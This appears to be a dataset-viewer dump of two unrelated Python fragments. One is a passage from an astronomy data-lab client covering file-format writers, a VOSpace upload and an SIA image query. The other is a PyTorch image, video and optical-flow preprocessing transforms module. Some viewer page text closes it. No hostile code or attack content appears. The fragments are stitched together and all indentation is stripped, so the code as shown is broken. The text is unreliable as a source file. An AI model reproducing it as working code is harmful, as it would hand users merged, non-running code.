# -'ascii', (1) csv
# -'array', (1) csv, (2) FITS array
# -'structarray', (1) csv, (2) FITS binary table
# -'pandas', (1) csv, (2) FITS binary table, (3) HDF5
# -'table', (1) csv, (2) FITS binary table, (3) HDF5
# -'votable', (1) csv (2) FITS binary table, (3) HDF5, XML not working right now
# These are functions to output the various types of files
# x=data, y=filename
writemap = { 'csv-csv': lambda x,y: writeAscii(y, x),
'ascii-csv': lambda x,y: writeAscii(y, x), # use tab-delimited
'ascii-ascii': lambda x,y: writeAscii(y, x),
'array-csv': lambda x,y: np.savetxt(y,x,delimiter=','),
'array-fits': lambda x,y: fits.writeto(y,x,overwrite=True),
'structarray-csv': lambda x,y: np.savetxt(y,x,delimiter=',',header=','.join(x.dtype.names)),
'structarray-fits': lambda x,y: fits.writeto(y,x,overwrite=True),
'pandas-csv': lambda x,y: x.to_csv(y,sep=',',header=True),
'pandas-fits': lambda x,y: Table.from_pandas(x).write(y,format='fits'),
'pandas-hdf5': lambda x,y: Table.from_pandas(x).write(y,format='hdf5',path='table'),
'table-csv': lambda x,y: x.write(y,format='ascii.csv'),
'table-fits': lambda x,y: x.write(y,format='fits'),
'table-hdf5': lambda x,y: x.write(y,format='hdf5',path='table'),
'votable-csv': lambda x,y: x.to_table().write(y,format='ascii.csv'),
'votable-fits': lambda x,y: x.to_table().write(y,format='fits'),
'votable-hdf5': lambda x,y: x.to_table().write(y,format='hdf5',path='table') }
# Check that we can deal with the requested input and output formats
if inptype+'-'+fmt not in writemap.keys():
print ("Output format '%s' for data type '%s' not currently supported." % (fmt, inptype))
return
# Write the file
try:
writemap[inptype+'-'+fmt](data,outname)
except Exception as e:
print ("There was a problem writing the file")
print (str(e))
# Put to VOSpace if necessary
if name.startswith('vos://'):
storeClient.put (token, outname, name, verbose=False)
os.remove(outname) # remove temporary file
################################################
# SIA Tasks
################################################
def siaquery(self, ra=None, dec=None, dist=None, verbose=False):
'''
Perform a SIA query with a set of coordinates or from an uploaded file.
Parameters
----------
ra : float
The right ascension (in degrees) of the point to use for the search.
dec : float
The declination (in degrees) of the point to use for the search.
dist : float
The search distance (radius) in degrees. The default is 0.0085 deg.
verbose : bool
Use verbose output. The default is False.
Returns
-------
images : votable
The list of images in Astropy table format.
Example
-------
Perform a simple SIA search.
.. code-block:: python
itab = dl.siaquery(0.5,10.0,0.1)
The image list contains 6 entries
Download the first image using :func:`copyurl()`.
.. code-block:: python
dl.copyurl(itab['access_url'][0],'im1.fits')
'''
# Not enough information input
if ((ra is None) or (dec is None)) :
print ("Syntax - dl.siaquery(ra, dec, dist, file=None, out=None, verbose=False)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
parts = token.strip().split(".")
uid = parts[1]
# Use pyvo.dal.sia for now
svc = sia.SIAService (SIA_DEF_ACCESS_URL)
if dist is None:
dist = SIA_DEF_SIZE
# Run the search query
with warnings.catch_warnings():
warnings.simplefilter('ignore', AstropyWarning) # Turn off some annoying astropy warnings
images = svc.search((ra,dec), (dist/np.cos(dec*np.pi/180), dist), verbosity=2)
nrows = images.votable.nrows
print ("The image list contains",nrows,"entries")
res = (images.votable.to_table() if nrows > 0 else None)
# Print the results if verbose set
if verbose is True and nrows > 0:
print (res)
return res
|
"""
This file is part of the private API. Please do not use directly these classes as they will be modified on
future versions without warning. The classes should be accessed only via the transforms argument of Weights.
"""
from typing import Optional, Tuple
import torch
from torch import Tensor, nn
from . import functional as F, InterpolationMode
__all__ = [
"ObjectDetection",
"ImageClassification",
"VideoClassification",
"SemanticSegmentation",
"OpticalFlow",
]
class ObjectDetection(nn.Module):
def forward(self, img: Tensor) -> Tensor:
if not isinstance(img, Tensor):
img = F.pil_to_tensor(img)
return F.convert_image_dtype(img, torch.float)
class ImageClassification(nn.Module):
def __init__(
self,
*,
crop_size: int,
resize_size: int = 256,
mean: Tuple[float, ...] = (0.485, 0.456, 0.406),
std: Tuple[float, ...] = (0.229, 0.224, 0.225),
interpolation: InterpolationMode = InterpolationMode.BILINEAR,
) -> None:
super().__init__()
self._crop_size = [crop_size]
self._size = [resize_size]
self._mean = list(mean)
self._std = list(std)
self._interpolation = interpolation
def forward(self, img: Tensor) -> Tensor:
img = F.resize(img, self._size, interpolation=self._interpolation)
img = F.center_crop(img, self._crop_size)
if not isinstance(img, Tensor):
img = F.pil_to_tensor(img)
img = F.convert_image_dtype(img, torch.float)
img = F.normalize(img, mean=self._mean, std=self._std)
return img
class VideoClassification(nn.Module):
def __init__(
self,
*,
crop_size: Tuple[int, int],
resize_size: Tuple[int, int],
mean: Tuple[float, ...] = (0.43216, 0.394666, 0.37645),
std: Tuple[float, ...] = (0.22803, 0.22145, 0.216989),
interpolation: InterpolationMode = InterpolationMode.BILINEAR,
) -> None:
super().__init__()
self._crop_size = list(crop_size)
self._size = list(resize_size)
self._mean = list(mean)
self._std = list(std)
self._interpolation = interpolation
def forward(self, vid: Tensor) -> Tensor:
need_squeeze = False
if vid.ndim < 5:
vid = vid.unsqueeze(dim=0)
need_squeeze = True
vid = vid.permute(0, 1, 4, 2, 3) # (N, T, H, W, C) => (N, T, C, H, W)
N, T, C, H, W = vid.shape
vid = vid.view(-1, C, H, W)
vid = F.resize(vid, self._size, interpolation=self._interpolation)
vid = F.center_crop(vid, self._crop_size)
vid = F.convert_image_dtype(vid, torch.float)
vid = F.normalize(vid, mean=self._mean, std=self._std)
H, W = self._crop_size
vid = vid.view(N, T, C, H, W)
vid = vid.permute(0, 2, 1, 3, 4) # (N, T, C, H, W) => (N, C, T, H, W)
if need_squeeze:
vid = vid.squeeze(dim=0)
return vid
class SemanticSegmentation(nn.Module):
def __init__(
self,
*,
resize_size: Optional[int],
mean: Tuple[float, ...] = (0.485, 0.456, 0.406),
std: Tuple[float, ...] = (0.229, 0.224, 0.225),
interpolation: InterpolationMode = InterpolationMode.BILINEAR,
) -> None:
super().__init__()
self._size = [resize_size] if resize_size is not None else None
self._mean = list(mean)
self._std = list(std)
self._interpolation = interpolation
def forward(self, img: Tensor) -> Tensor:
if isinstance(self._size, list):
img = F.resize(img, self._size, interpolation=self._interpolation)
if not isinstance(img, Tensor):
img = F.pil_to_tensor(img)
img = F.convert_image_dtype(img, torch.float)
img = F.normalize(img, mean=self._mean, std=self._std)
return img
class OpticalFlow(nn.Module):
def forward(self, img1: Tensor, img2: Tensor) -> Tuple[Tensor, Tensor]:
if not isinstance(img1, Tensor):
img1 = F.pil_to_tensor(img1)
if not isinstance(img2, Tensor):
img2 = F.pil_to_tensor(img2)
img1 = F.convert_image_dtype(img1, torch.float)
img2 = F.convert_image_dtype(img2, torch.float)
# map [0, 1] into [-1, 1]
img1 = F.normalize(img1, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
img2 = F.normalize(img2, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
img1 = img1.contiguous()
img2 = img2.contiguous()
return img1, img2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.